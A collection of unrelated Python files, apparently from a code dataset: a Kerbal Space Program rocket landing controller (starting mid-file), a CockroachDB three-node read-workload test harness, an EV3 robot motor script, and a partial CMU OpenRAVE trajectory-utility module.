#return (v3(0,0,0), v3(0,0,0), v3( 9.807,0,0))
elif index <= 0:
i = 0
frac = index
else:
i = math.floor(index)
frac = index - i
r_i_s = lerp(rk[:, i], rk[:, i+1], frac)
v_i_s = lerp(vk[:, i], vk[:, i+1], frac)
q_i_s = lerp(qk[:, i], qk[:, i+1], frac)
u_i_s = lerp(uk[:, i], uk[:, i+1], frac)
if index < 0:
u_i_s = uk[:, 1].copy()
#print('u1234 ' + str(u[:, 0:4]))
#print('u_i_s ' + str(u[:, 1]))
return (r_i_s.copy(), v_i_s.copy(), q_i_s.copy(), u_i_s.copy())
def conic_clamp(target_a, min_mag, max_mag, max_tilt):
a_mag = npl.norm(target_a)
hor_dir = v3(0, target_a[1], target_a[2])
hor_dir /= npl.norm(hor_dir)
#target_direction = target_a / a_mag
a_hor = npl.norm(target_a[1:3])
a_ver = target_a[0]
if (a_hor < min_mag * math.sin(max_tilt)):
a_ver_min = math.sqrt(min_mag**2 - a_hor**2)
else:
a_ver_min = math.cos(max_tilt) * min_mag
if (a_hor < max_mag * math.sin(max_tilt)):
a_ver_max = math.sqrt(max_mag**2 - a_hor**2)
else:
a_ver_max = math.cos(max_tilt) * max_mag
a_ver = clamp(a_ver, a_ver_max, a_ver_min)
a_hor = min(a_hor, a_ver * math.tan(max_tilt))
return hor_dir * a_hor + v3(a_ver, 0, 0)
def solve_path(vessel_profile, vessel_state, vessel_final_state):
global solved_path, n_i
print('----------vessel_profile(original)------------')
for k in (vessel_profile.__dict__):
print('-- %s: \n%s' % (k, vessel_profile.__dict__[k]))
print('----------vessel_state(original)------------')
for k in (vessel_state.__dict__):
print('-- %s: \n%s' % (k, vessel_state.__dict__[k]))
print('----------vessel_final_state(original)------------')
for k in (vessel_final_state.__dict__):
print('-- %s: \n%s' % (k, vessel_final_state.__dict__[k]))
solver_options = SC_params.SolverOptions()
solver_options.w_delta = lambda i:(1e-3 * (2 ** i))
#solver_options.w_nu = 1e5
print('---------solving----------')
solved_path = solver.solve(vessel_profile, vessel_state, vessel_final_state,
solver_options=solver_options, use_c=True, verbose=True)
if solved_path != None:
(x, u, tf) = solved_path
qw, qx, qy, qz = x[7:11, :]
x[7:11, :] = vec(qx, qy, qz, qw) # wxyz转xyzw
n_i = -100
solved_path = (x, u, tf)
# print('x slice')
# print(x[:, 0:3])
# print('u slice')
# print(u[:, 0:3])
print('---------solve done----------')
if debug_lines:
update_lines(x, u)
else:
print('---------solve error----------')
print('---------loop start-------------')
combine_flaps(0, 0)
while True:
time.sleep(delta_time)
real_time = time.time() - start_time
ut = space_center.ut
game_delta_time = ut - game_prev_time
if game_delta_time < 0.01: #意味着游戏中还没有经过一个物理帧,所以不进行计算
continue
# 取得一些之后要用的数据
vessel_d = {}
error = vessel_d['error'] = vec(vessel.position(ref_target)) # 目标系里的偏差
avel = vessel_d['avel'] = vec(vessel.angular_velocity(ref_surface)) # 地面系下角速度(等于目标系角速度
vel = vessel_d['vel'] = vec(vessel.velocity(ref_target)) # 地面速度
rotation_local2srf = rotation_mat(vec(vessel.rotation(ref_surface))) # 机体系到地面系旋转矩阵
rotation_srf2local = npl.inv(rotation_local2srf) # 地面系到机体系旋转矩阵
moment_of_inertia_local = vec(vessel.moment_of_inertia) # 转动惯量
mass = vessel_d['mass'] = vessel.mass
max_thrust = vessel_d['max_thrust'] = vessel.available_thrust
acceleration = vessel_d['acceleration'] = (vel - prev_vel) / game_delta_time
#print(game_delta_time)
if nav_mode == 'launch': #跳到一定高度
balanced_thr = mass * g0 / max_thrust
target_direction = v3(1, 0.02, 0) #偏北一点
#print(target_direction)
vessel.control.throttle = balanced_thr + (params['hop_vel'] - npl.norm(vel)) * 0.05
#print(error[0])
if (error[0] > params['hop_altitude']):
nav_mode = 'transit'
print('transit')
elif nav_mode == 'transit': #减弱推力直到垂直速度为负
balanced_thr = mass * g0 / max_thrust
target_direction = v3(1, 0, 0)
vessel.control.throttle = balanced_thr * 0.25
if (vel[0] < -10):
vessel.control.rcs = False
vessel.control.pitch = -1
time.sleep(1) #保持一秒
vessel.control.pitch = 0
vessel.control.throttle = 0
nav_mode = 'fall'
print('fall')
elif nav_mode == 'fall': # 下落阶段 翼面控制姿态
pitch_target = clamp(ctrl_fall_distance.update((math.sqrt(error[2]**2 + error[1]**2) - params['ctrl_fall_distance_target']) / 200., game_delta_time), -1, 1) * 15
pitch_error = (flight.pitch - pitch_target) * deg2rad
hdg_target = math.atan2(-error[2], -error[1]) * rad2deg
hdg_error = norm_deg(flight.heading - hdg_target) * deg2rad
#print(ctrl_fall_pitch.integral, math.sqrt(error[2]**2 + error[1]**2))
if (abs(pitch_error) < 0.3):
ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki']
pitch_flap = ctrl_fall_pitch.update(pitch_error, game_delta_time)
yaw_flap = ctrl_fall_yaw.update(hdg_error, game_delta_time)
combine_flaps(pitch_flap, yaw_flap) #+0.1trim
if error[0] < params['start_altitude']: #开始规划路径
#frcount -= 1
if frcount <= 0:
frcount = 1
vessel_profile = get_vessel_profile(vessel)
vessel_state = predict_vessel_state(vessel, params['predict_altitude']) #计算要耗时,所以代入外推预测的未来状态
vessel_final_state = get_final_state(vessel, params['final_height'])
conn.krpc.paused = True # ザ·ワールド
#Thread(target=solve_path, args=(vessel_profile, vessel_state)).start()
solve_path(vessel_profile, vessel_state, vessel_final_state)
conn.krpc.paused = False
if (error[0] <= params['predict_altitude'] and solved_path != None):
n_i = 0
vessel.control.sas = False
vessel.control.rcs = True
nav_mode = 'convex'
retract_flaps()
print('convex')
elif nav_mode == 'convex': #沿路径
(x, uk, tf) = solved_path
mk = x[0, :] #mass
rk = x[1:4, :] # position
vk = x[4:7, :] # vel
qk = x[7:11, :] # quaternion
wk = x[11:14, :] # omega
di = game_delta_time * K/tf
n_i = clamp(find_nearest_index(rk, vk, error), n_i + di * 0.5, n_i + di * 1.5)
#n_i = max(n_i - game_delta_time * 0.2 * K/tf, find_nearest_index(rk, vk, error)) #找到当前最近轨迹位置
#print(game_delta_time)
(r_i, v_i, q_i, u_i) = sample_index(n_i, rk, vk, qk, uk) #规划的位置速度
(r_i_, v_i_, q_i_, u_i_) = sample_index(n_i + 0.4 * K/tf, rk, vk, qk, uk) #预测一小段时间以后
q_i_mat = rotation_mat(q_i)
q_i_mat_ = rotation_mat(q_i_)
u_i = transform(u_i, q_i_mat)
u_i_ = transform(u_i_, q_i_mat_)
head_i = transform(vec(1, 0, 0), q_i_mat)
head_i_ = transform(vec(1, 0, 0), q_i_mat_)
#v_i_dir = v_i / npl.norm(v_i)
# target_a = u_i_
# target_v = v_i_
# target_x = r_i # + np.dot((error - r_i), v_i_dir) * v_i_dir
# #print(n_i, target_a, target_v, target_x)
# target_a += (target_v - vel) * k_v + (target_x - error) * k_x
# target_a = u_i + (v_i - vel) * k_v + (r_i - error) * k_x
# target_a_ = u_i_ + (v_i_ - vel) * k_v + (r_i - error) * k_x
target_a = npl.norm(u_i) / mass * head_i + (v_i - vel) * k_v + (r_i - error) * k_x
target_a_ = npl.norm(u_i_) / mass * head_i_ + (v_i - vel) * k_v + (r_i - error) * k_x
if debug_lines:
target_line.start = error
target_line.end = (r_i[0], r_i[1], r_i[2])
target2_line.start = error
target2_line.end = (r_i_[0], r_i_[1], r_i_[2])
max_throttle_ctrl = throttle_limit_ctrl[1] * (max_thrust / mass)
min_throttle_ctrl = throttle_limit_ctrl[0] * (max_thrust / mass)
target_a = transform(target_a, q_i_mat.T)
target_a = conic_clamp(target_a, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a = transform(target_a, q_i_mat)
target_a_ = transform(target_a_, q_i_mat_.T)
target_a_ = conic_clamp(target_a_, min_throttle_ctrl, max_throttle_ctrl, max_tilt_off)
target_a_ = transform(target_a_, q_i_mat_)
# if n_i < 0 :
# target_a = np.array([g0, 0, 0]) + u_i
#target_direction = target_a_ / npl.norm(target_a_)
#target_throttle = npl.norm(target_a) / (max_thrust / mass)
target_direction = target_a_ / npl.norm(target_a_)
target_throttle = npl.norm(target_a) / (max_thrust / mass)
#print(target_a)
if debug_lines:
head_line.start = error
head_line.end = error + target_direction * 8
if n_i > 0:
vessel.control.throttle = target_throttle
if (K - n_i) * tf / K < 6:
vessel.control.gear = True
if npl.norm(error[1:3]) < params['final_radius'] and npl.norm(error[0]) < params['final_height']:
vessel.control.gear = not vessel.control.gear
engine_gimbal.set_field_float('Gimbal Limit', 30) # 防止震荡
print('final')
nav_mode = 'final'
elif nav_mode == 'final':
max_acc = throttle_limit_ctrl[1] * (max_thrust / mass) - g0
max_acc_low = throttle_limit_ctrl[1] * final_throttle * (max_thrust / mass) - g0
est_h = error[0] - vel[0]**2 / (2 * max_acc)
est_h_low = error[0] - vel[0]**2 / (2 * max_acc_low)
est_h_center = (est_h + est_h_low) / 2
vessel.control.throttle = clamp(lerp(throttle_limit_ctrl[1] * final_throttle, throttle_limit_ctrl[1], -est_h_low / (est_h - est_h_low) * (1+final_kp)), throttle_limit_ctrl[1], throttle_limit_ctrl[0])
error_hor = v3(0, error[1], error[2])
vel_hor = v3(0, vel[1], vel[2])
ctrl_hor = -error_hor * 0.03 - vel_hor * 0.06
target_direction = ctrl_hor + v3(1, 0, 0)
target_direction /= npl.norm(target_direction)
target_direction = conic_clamp(target_direction, 1, 1, max_tilt)
else:
nav_mode = 'launch'
if (max_thrust == 0):
vessel.control.activate_next_stage()
vessel.control.rcs = True
vessel.control.gear = not vessel.control.gear
continue
#target_direction = -vel
#vessel.control.throttle = 0
# 变换到机体坐标系计算姿态控制,以下xyz均指机体系
if nav_mode in ['final', 'convex', 'launch', 'transit']:
target_direction_local = transform(target_direction, rotation_srf2local) # 机体系的目标姿态的机体y轴指向
avel_local = transform(avel, rotation_srf2local) # 机体系角速度
# 三个轴方向能提供的最大角加速度
#authority_local = (torque + torque_k * vessel.control.throttle) / moment_of_inertia_local
#authority_local = np.abs(vec(vessel.available_torque[0])) / moment_of_inertia_local
#ctrl_x_rot.unified_authority = authority_local[0]
#ctrl_z_rot.unified_authority = authority_local[2]
# pid控制,roll直接消除角速度
#control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), avel_local[0]), 1, -1)
#control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), avel_local[2]), 1, -1)
control_pitch = -clamp(ctrl_x_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(1, 0, 0)), game_delta_time), 1, -1)
control_yaw = -clamp(ctrl_z_rot.update(angle_around_axis(target_direction_local, v3(0, 1, 0), v3(0, 0, 1)), game_delta_time), 1, -1)
control_roll = clamp(avel_local[1] * ctrl_y_avel_kp, 1, -1)
vessel.control.pitch = control_pitch
vessel.control.yaw = control_yaw
vessel.control.roll = control_roll
# 终止条件
if nav_mode == 'final':
if (npl.norm(error[1:3]) < 3 and npl.norm(error[0]) < 1 and npl.norm(vel[1:3]) < 0.3 and npl.norm(vel[0]) < 0.5 and npl.norm(avel) < 0.2) or (vel[0] > 0 and npl.norm(error[0]) < 1):
print('exit')
vessel.control.throttle = 0
break
prev_vel = vel
game_prev_time = ut
|
cockroach_workload_read.py
|
#!/usr/bin/env python
import os
import sys
import shutil
import time
import psycopg2
import subprocess
import multiprocessing
CURR_DIR=os.path.dirname(os.path.realpath(__file__))
server_dirs = []
server_logs = []
log_dir = None
assert len(sys.argv) >= 4
for i in range(1, 4):
server_dirs.append(sys.argv[i])
def invoke_cmd(cmd):
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return (out, err)
#if logdir specified
if len(sys.argv) == 5:
log_dir = sys.argv[-1]
for i in range(0, 3):
server_logs.append(os.path.join(log_dir, 'log-'+ str(i)))
os.system('rm -rf '+ os.path.join(log_dir, 'log-'+ str(i)))
os.system('mkdir '+ os.path.join(log_dir, 'log-'+ str(i)))
else:
for i in range(0, 3):
server_logs.append(os.path.join(CURR_DIR, 'log-'+ str(i)))
os.system('rm -rf '+ os.path.join(CURR_DIR, 'log-'+ str(i)))
os.system('mkdir '+ os.path.join(CURR_DIR, 'log-'+ str(i)))
os.system('killall cockroach')
os.system('killall cockroach')
os.system('killall cockroach')
time.sleep(3)
COCKROACH_HOME='/mnt/data1/scratch/work/adsl-work/d2s/applications/cockroach/cockroach-beta-20160714.linux-amd64'
os.system('%s/cockroach start --store=%s --log-dir=%s &'%(COCKROACH_HOME, server_dirs[0], server_logs[0]))
os.system('%s/cockroach start --store=%s --log-dir=%s --port=26258 --http-port=8081 --join=localhost:26257 --join=localhost:26259 &'%(COCKROACH_HOME, server_dirs[1], server_logs[1]))
os.system('%s/cockroach start --store=%s --log-dir=%s --port=26259 --http-port=8082 --join=localhost:26257 --join=localhost:26258 &'%(COCKROACH_HOME, server_dirs[2], server_logs[2]))
time.sleep(2)
def logger_log(log_dir, str):
if log_dir is not None:
assert os.path.isdir(log_dir) and os.path.exists(log_dir)
client_log_file = os.path.join(log_dir, 'log-client')
with open(client_log_file, 'a') as f:
f.write(str)
else:
print(str.replace('\n', ';'))
before_status = [False, False, False]
logger_log(log_dir, 'Before workload\n')
out, err = invoke_cmd('ps aux | grep cockroach-beta-20160714.linux-amd64')
print out, err
to_write = ''
out = out.split('\n')
out = [i for i in out if i is not None and len(i) > 0 and ('workload_dir0' in i or 'workload_dir1' in i or 'workload_dir2' in i)]
to_check = ['workload_dir0', 'workload_dir1', 'workload_dir2']
j = 0
for check in to_check:
found = False
for i in out:
if check in i:
found = True
to_write += check.replace('workload_dir', 'node') + ' running:' + str(found) + '\n'
before_status[j] = found
j += 1
logger_log(log_dir, to_write)
logger_log(log_dir, '----------------------------------------------\n')
def do_work(server_id, port):
inited_value = 'a' * 8192
retry = 0
while(retry < 3):
try:
logger_log(log_dir, 'Connecting to ' + str(server_id) + ' at port:' + str(port) + '\n')
conn = psycopg2.connect(host="localhost", port=port, database = "mydb", user="root", connect_timeout=5)
logger_log(log_dir, 'Connected to ' + str(server_id)+ '\n')
conn.set_session(autocommit=True)
cur = conn.cursor()
cur.execute("SELECT * FROM mytable;")
logger_log(log_dir, 'Executed on ' + str(server_id)+ '\n')
result = []
for record in cur:
result.append(record)
logger_log(log_dir, 'Server:' + str(server_id) + ' Record count:' + str(len(result)) + '\n')
for r in result:
logger_log(log_dir, 'Server:' + str(server_id) + ' Correct value present:' + str(len(r) == 2 and r[0] == 1 and inited_value == str(r[1])) + '\n')
if not (len(r) == 2 and r[0] == 1 and inited_value == str(r[1])):
logger_log(log_dir, 'Server:' + str(server_id) + ' Value returned:' + str(r) + '\n')
cur.close()
conn.close()
break #if executed successfully just break
except Exception as e:
retry += 1
logger_log(log_dir, 'Server:' + str(server_id) + ' Exception:' + str(e) + '\n')
time.sleep(1)
server_ports = ["26257", "26258", "26259"]
for i in range(0, len(server_ports)):
if before_status[i] == True:
high_level_retry = 0
while high_level_retry <= 1:
p = multiprocessing.Process(target=do_work, args=(i, server_ports[i],))
p.start()
p.join(25)
if p.is_alive():
p.terminate()
p.join()
logger_log(log_dir, 'HLT: '+ str(high_level_retry) +' Worker thread for server:'+ str(i)+ ' killed after 25 seconds!\n')
high_level_retry += 1
else:
break
else:
logger_log(log_dir, 'Server ' + str(i) + ' is not running. So will not connect.\n')
logger_log(log_dir, '----------------------------------------------\n')
logger_log(log_dir, 'After workload\n')
out, err = invoke_cmd('ps aux | grep cockroach-beta-20160714.linux-amd64')
to_write = ''
out = out.split('\n')
out = [i for i in out if i is not None and len(i) > 0 and ('workload_dir0' in i or 'workload_dir1' in i or 'workload_dir2' in i)]
to_check = ['workload_dir0', 'workload_dir1', 'workload_dir2']
for check in to_check:
found = False
for i in out:
if check in i:
found = True
to_write += check.replace('workload_dir', 'node') + ' running:' + str(found) + '\n'
logger_log(log_dir, to_write)
os.system('killall cockroach')
os.system('killall cockroach')
os.system('killall cockroach')
time.sleep(1)
|
main.py
|
#!/usr/bin/env pybricks-micropython
import struct, threading
from pybricks import ev3brick as brick
from pybricks.ev3devices import (
Motor,
TouchSensor,
ColorSensor,
InfraredSensor,
UltrasonicSensor,
GyroSensor,
)
from pybricks.parameters import (
Port,
Stop,
Direction,
Button,
Color,
SoundFile,
ImageFile,
Align,
)
from pybricks.tools import print, wait, StopWatch
from pybricks.robotics import DriveBase
from devices import detectJoystick
class Robot:
def __init__(self):
self.motor = Motor(Port.B)
self.ultrasonic = UltrasonicSensor(Port.S4)
self.active = True
self.speed = 0
self.colors = [None, Color.GREEN, Color.YELLOW, Color.RED]
def setSpeed(self, acc):
if acc < 0:
self.speed = max(-3, self.speed - 1)
elif acc > 0:
self.speed = min(3, self.speed + 1)
else:
self.speed = 0
if self.speed != 0:
self.motor.run(self.speed * 90)
else:
self.motor.stop()
brick.light(self.colors[abs(self.speed)])
def inactive(self):
self.active = False
self.setSpeed(0)
brick.sound.beep()
def autoStopLoop(robot):
while robot.active:
if robot.speed > 0 and robot.ultrasonic.distance() < 200:
robot.setSpeed(0)
wait(100)
def joystickLoop(robot, eventFile):
FORMAT = "llHHI"
EVENT_SIZE = struct.calcsize(FORMAT)
with open(eventFile, "rb") as infile:
while True:
event = infile.read(EVENT_SIZE)
_, _, t, c, v = struct.unpack(FORMAT, event)
# button A, B:
if t == 1 and v == 1:
if c == 305:
# press A:
robot.setSpeed(1)
elif c == 304:
# press B:
robot.setSpeed(-1)
elif c == 307:
# press X:
return robot.inactive()
elif t == 3:
if c == 1:
# Left stick & vertical:
speed = 0
if v < 32768:
# up:
speed = 1
elif v > 32768:
# down:
speed = -1
robot.setSpeed(speed)
def buttonLoop(robot):
while True:
if not any(brick.buttons()):
wait(10)
else:
if Button.LEFT in brick.buttons():
robot.setSpeed(-1)
elif Button.RIGHT in brick.buttons():
robot.setSpeed(1)
elif Button.CENTER in brick.buttons():
robot.setSpeed(0)
elif Button.UP in brick.buttons():
return robot.inactive()
wait(500)
def main():
brick.sound.beep()
joystickEvent = detectJoystick(["Controller"])
robot = Robot()
t = threading.Thread(target=autoStopLoop, args=(robot,))
t.start()
if joystickEvent:
joystickLoop(robot, joystickEvent)
else:
buttonLoop(robot)
main()
|
util.py
|
#!/usr/bin/env python
# Copyright (c) 2013, Carnegie Mellon University
# All rights reserved.
# Authors: Michael Koval <mkoval@cs.cmu.edu>
# Authors: Siddhartha Srinivasa <siddh@cs.cmu.edu>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of Carnegie Mellon University nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import logging
import math
import numpy
import openravepy
import scipy.misc
import scipy.optimize
import threading
import time
import warnings
logger = logging.getLogger(__name__)
def create_sensor(env, args, anonymous=True):
sensor = openravepy.RaveCreateSensor(env, args)
if sensor is None:
raise Exception("Creating '%s' sensor failed." % args.split()[0])
env.Add(sensor, anonymous)
return sensor
def CreatePlannerParametersString(options, params=None,
remove_postprocessing=True):
""" Creates an OpenRAVE parameter XML string.
OpenRAVE planners have an InitPlan function that either take an instance of
the PlannerParameters() struct or the serialized XML version of this
struct. Unfortunately, it is not possible to override several default
options in the Python API. This function takes a seed PlannerParameters
struct and a dictionary of key-value pairs to override. It returns XML that
can be passed directly to InitPlan.
@param options: dictionary of key-value pairs
@type options: {str: str}
@param params: input struct (defaults to the defaults in OpenRAVE)
@type params: openravepy.Planner.PlannerParameters
@return planner parameters string XML
@rtype str
"""
import lxml.etree
import openravepy
from copy import deepcopy
options = deepcopy(options)
if remove_postprocessing:
options['_postprocessing'] = None
if params is None:
params = openravepy.Planner.PlannerParameters()
params_xml = lxml.etree.fromstring(params.__repr__().split('"""')[1])
for key, value in options.iteritems():
element = params_xml.find(key)
# Remove a value if "value" is None.
if value is None:
if element is not None:
params_xml.remove(element)
# Add (or overwrite) and existing value.
else:
if element is None:
element = lxml.etree.SubElement(params_xml, key)
element.text = str(value)
if remove_postprocessing:
params_xml.append(
lxml.etree.fromstring("""
<_postprocessing planner="">
<_nmaxiterations>20</_nmaxiterations>
<_postprocessing planner="parabolicsmoother">
<_nmaxiterations>100</_nmaxiterations>
</_postprocessing>
</_postprocessing>
""")
)
return lxml.etree.tostring(params_xml)
def HasGroup(cspec, group_name):
try:
cspec.GetGroupFromName(group_name)
return True
except openravepy.openrave_exception:
return False
def HasAffineDOFs(cspec):
return (HasGroup(cspec, 'affine_transform') or
HasGroup(cspec, 'affine_velocities') or
HasGroup(cspec, 'affine_accelerations'))
def HasJointDOFs(cspec):
return (HasGroup(cspec, 'joint_values') or
HasGroup(cspec, 'joint_velocities') or
HasGroup(cspec, 'joint_accelerations') or
HasGroup(cspec, 'joint_torques'))
def GetTrajectoryIndices(traj):
try:
cspec = traj.GetConfigurationSpecification()
joint_values_group = cspec.GetGroupFromName('joint_values')
return numpy.array([int(index) for index in
joint_values_group.name.split()[2:]])
except openravepy.openrave_exception:
return list()
def WaitForControllers(controllers, timeout=None, rate=20):
running_controllers = set(controllers)
start_time = time.time()
timestep = 1.0 / rate
while running_controllers:
# Check for a timeout.
now_time = time.time()
if timeout is not None and now_time - start_time > timeout:
return False
# Check if the trajectory is done.
done_controllers = set()
for controller in running_controllers:
if controller.IsDone():
done_controllers.add(controller)
running_controllers -= done_controllers
time.sleep(timestep)
return True
def SetCameraFromXML(viewer, xml):
if isinstance(viewer, openravepy.Environment):
viewer = viewer.GetViewer()
import lxml.etree
from StringIO import StringIO
padded_xml = '<bogus>{0:s}</bogus>'.format(xml)
camera_xml = lxml.etree.parse(StringIO(padded_xml))
translation_raw = camera_xml.find('//camtrans').text
axis_raw = camera_xml.find('//camrotationaxis').text
focal_raw = camera_xml.find('//camfocal').text
translation = numpy.loadtxt(StringIO(translation_raw))
axis_angle = numpy.loadtxt(StringIO(axis_raw))
axis_angle = axis_angle[3] * axis_angle[0:3] * (numpy.pi / 180)
focal = float(focal_raw)
transform = openravepy.matrixFromAxisAngle(axis_angle)
transform[0:3, 3] = translation
viewer.SetCamera(transform, focal)
def TakeSnapshot(viewer, path=None, show_figures=True,
width=1920, height=1080, fx=640, fy=640):
if isinstance(viewer, openravepy.Environment):
viewer = viewer.GetViewer()
viewer.SendCommand('SetFiguresInCamera {0:d}'.format(show_figures))
image = viewer.GetCameraImage(width, height, viewer.GetCameraTransform(),
[fx, fy, width / 2, height / 2])
if path is not None:
scipy.misc.imsave(path, image)
return image
def ComputeAinv(N, dof):
dt = 1.0 / (N - 1)
K = numpy.mat(numpy.zeros((N - 1, N - 1)))
for i in range(1, N - 1):
K[i, i] = 1 / dt
K[i, i - 1] = -1 / dt
K[0, 0] = 1 / dt
A = K.transpose() * K
invA_small = numpy.linalg.inv(A)
# Tensorize.
invA = numpy.mat(numpy.zeros([(N) * dof, (N) * dof]))
for i in range(1, N):
for j in range(1, N):
for k in range(dof):
invA[i * dof + k, j * dof + k] = invA_small[i - 1, j - 1]
return invA
def NormalizeVector(vec):
"""
Normalize a vector.
This is faster than doing: vec/numpy.linalg.norm(vec)
@param numpy.array vec: A 1-dimensional vector.
@returns numpy.array result: A vector of the same size, where the
L2 norm of the elements equals 1.
"""
numpy.seterr(divide='ignore', invalid='ignore')
magnitude = numpy.sqrt(vec.dot(vec))
vec2 = (vec / magnitude)
return numpy.nan_to_num(vec2) # convert NaN to zero
def MatrixToTraj(traj_matrix, cs, dof, robot):
env = robot.GetEnv()
traj = openravepy.RaveCreateTrajectory(env, '')
traj.Init(cs)
for i in range(numpy.size(traj_matrix) / dof):
tp = traj_matrix[range(i * dof, i * dof + dof)]
tp = numpy.array(tp.transpose())[0]
traj.Insert(i, tp)
openravepy.planningutils.RetimeActiveDOFTrajectory(
traj, robot, False, 0.2, 0.2, "LinearTrajectoryRetimer", "")
return traj
def TrajToMatrix(traj, dof):
traj_matrix = numpy.zeros(dof * (traj.GetNumWaypoints()))
traj_matrix = numpy.mat(traj_matrix).transpose()
for i in range(traj.GetNumWaypoints()):
d = traj.GetWaypoint(i)[range(dof)]
d = numpy.mat(d).transpose()
traj_matrix[range(i * dof, (i + 1) * dof)] = d
return traj_matrix
def AdaptTrajectory(traj, new_start, new_goal, robot):
"""
Adapt an existing trajectory to move between a new start and goal.
The trajectory's configuration specification must contain exactly one group
called "joint_values". Note that this does NOT collision check the warped
trajectory.
@param traj input trajectory
@param new_start new starting configuration
@param new_goal new goal configuration
@param robot
@return adapted trajectory
"""
# TODO: check joint limits
# TODO: support arbitrary trajectory types
# TODO: collision check the warped trajectory
# TODO: this should not require a robot as a parameter
cs = traj.GetConfigurationSpecification()
dof = cs.GetDOF()
start = traj.GetWaypoint(0)
start = start[range(dof)]
goal = traj.GetWaypoint(traj.GetNumWaypoints() - 1)
goal = goal[range(dof)]
traj_matrix = TrajToMatrix(traj, dof)
# Translate trajectory to match start point.
diff_start = new_start - start
diff_start = numpy.mat(diff_start).transpose()
translated_traj = numpy.zeros(dof * (traj.GetNumWaypoints()))
translated_traj = numpy.mat(translated_traj).transpose()
for i in range(traj.GetNumWaypoints()):
translated_traj[range((i - 1) * dof, i * dof)] = \
traj_matrix[range((i - 1) * dof, i * dof)] - diff_start
# Apply correction to reach goal point.
new_traj_matrix = translated_traj
N = traj.GetNumWaypoints()
goal_translated = new_traj_matrix[range((N - 1) * dof, (N) * dof)]
Ainv = ComputeAinv(N, dof)
goal_diff = numpy.mat(new_goal).transpose() - goal_translated
traj_diff = numpy.zeros(dof * (N))
traj_diff = numpy.mat(traj_diff).transpose()
traj_diff[range((N - 1) * dof, (N) * dof)] = goal_diff
new_traj_matrix += Ainv * traj_diff / Ainv[N * dof - 1, N * dof - 1]
new_traj = MatrixToTraj(new_traj_matrix, cs, dof, robot)
return new_traj
def CopyTrajectory(traj, env=None):
"""
Create a new copy of a trajectory using its Clone() operator.
@param traj input trajectory
@param env optional environment used to initialize a trajectory
@return copy of the trajectory
"""
copy_traj = openravepy.RaveCreateTrajectory(env or traj.GetEnv(),
traj.GetXMLId())
copy_traj.Clone(traj, 0)
copy_traj.SetDescription(traj.GetDescription())
return copy_traj
def GetTrajectoryTags(traj):
"""
Read key/value pairs from a trajectory.
The metadata is can be set by SetTrajectoryTags; see that function for
details. If no metadata is set, this function returns an empty dictionary.
@param traj input trajectory
@return dictionary of string key/value pairs
"""
import json
description = traj.GetDescription()
if description == '':
return dict()
else:
try:
return json.loads(description)
except ValueError as e:
logger.warning('Failed reading tags from trajectory: %s',
e.message)
return dict()
def SetTrajectoryTags(traj, tags, append=False):
"""
Tag a trajectory with a dictionary of key/value pairs.
If append = True, then the dictionary of tags is added to any existing tags
on the trajectory. Otherwise, all existing tags will be replaced. This
metadata can be accessed by GetTrajectoryTags. Currently, the metadata is
stored as JSON in the trajectory's description.
@param traj input trajectory
@param append if true, retain existing tags on the trajectory
"""
import json
if append:
all_tags = GetTrajectoryTags(traj)
all_tags.update(tags)
else:
all_tags = tags
traj.SetDescription(json.dumps(all_tags))
def SimplifyTrajectory(traj, robot):
"""
Re-interpolate trajectory as minimal set of linear segments.
This function attempts to extract linear segments from the given
trajectory by iteratively finding extrema waypoints until a set of
linear segments until all of the original trajectory waypoints are
within the robot's joint resolutions of the interpolated segments.
Currently, only untimed trajectories are supported!
@param robot the robot that should be used for the interpolation
@param traj input trajectory that will be simplified
@returns output trajectory of timed linear segments
"""
from scipy import interpolate
if traj.GetDuration() != 0.0:
raise ValueError("Cannot handle timed trajectories yet!")
if traj.GetNumWaypoints() < 2:
return traj
cspec = traj.GetConfigurationSpecification()
dofs = robot.GetActiveDOFIndices()
idxs = range(traj.GetNumWaypoints())
joints = [robot.GetJointFromDOFIndex(d) for d in dofs]
times = numpy.array(
idxs if not traj.GetDuration() else
numpy.cumsum([cspec.ExtractDeltaTime(traj.GetWaypoint(i),
robot, dofs) for i in idxs]))
values = numpy.array(
[cspec.ExtractJointValues(traj.GetWaypoint(i), robot, dofs)
for i in idxs])
resolutions = numpy.array([j.GetResolution(0) for j in joints])
# Start with an extrema set of the first to the last waypoint.
mask = numpy.zeros(times.shape, dtype=bool)
mask[[0, -1]] = True
for _ in idxs:
# Create new interpolation set from current extrema.
f = interpolate.interp1d(times[mask], values[mask, :],
axis=0, kind='linear')
errors = numpy.abs(f(times) - values)
# TODO: Can this be a single call?
# Find the extrema in the remaining waypoints.
max_err_idx = numpy.argmax(errors, axis=0)
